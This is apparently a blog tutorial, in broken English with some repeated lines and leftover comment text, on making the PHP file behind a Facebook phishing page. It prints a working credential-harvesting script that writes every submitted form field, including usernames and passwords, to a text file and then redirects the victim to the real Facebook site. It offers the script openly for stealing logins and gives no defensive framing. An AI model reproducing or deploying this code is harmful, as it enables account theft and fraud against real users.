HOW TO MAKE PHP FILE
HELLO! guys i show you how to make php file for facebook phishing page. many websities show you how to make phishing but i will show you how to make this file show guys follow my blog because you know about more hacking and tips
show guys lets start our LOOBY
i show you STEP-BY-STEP :-
NOW START
STEP :- 1 first of all you open the NOTEPAD/NOTEPAD++ in any windows
(notepad ++)
NOTE:- if you have no notepad++
click here to icon
now
STEP:-2 you don't have to type because its too booooring... so copy this script given below
<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
so guys copy this text
STEP:-3 now you have to paste this text in notepad and notepad++
notepad
notepad++
STEP:-4 by the defult your data have space in both notepad/notepad++ between two lines
LIKE THIS
13 BOXER ( means 13 space) in notepad
\
also 13 boxes so 13 space here
/
STEP:- 5 simply you terminate/remove these space in (notepad/notepad++)
as your suitable use
like this
(notepad) there is no space between two lines.
(notepad++) there is no space between two lines.
STEP:-6 Now you have to save this file in notepad/notepad++ for any name.php
NOTE - IT'S necessary to use the extension name .php
i save this file on desktop with named post.php
now you can entre this name in your fishing page.
IF YOU WANT TO LEARN IT WITH VIDEO CLICK THE LNK GIVEN BELOW
SUSCRIBE YOURRECOMND AND LIKE
i save this file on desktop with named post.php
now you can entre this name in your fishing page.
IF YOU WANT TO LEARN IT WITH VIDEO CLICK THE LNK GIVEN BELOW
SUSCRIBE YOURRECOMND AND LIKE
space is not valid
ReplyDeleteYes you have to delete all space
Deleteand html codeis working in .php
ReplyDelete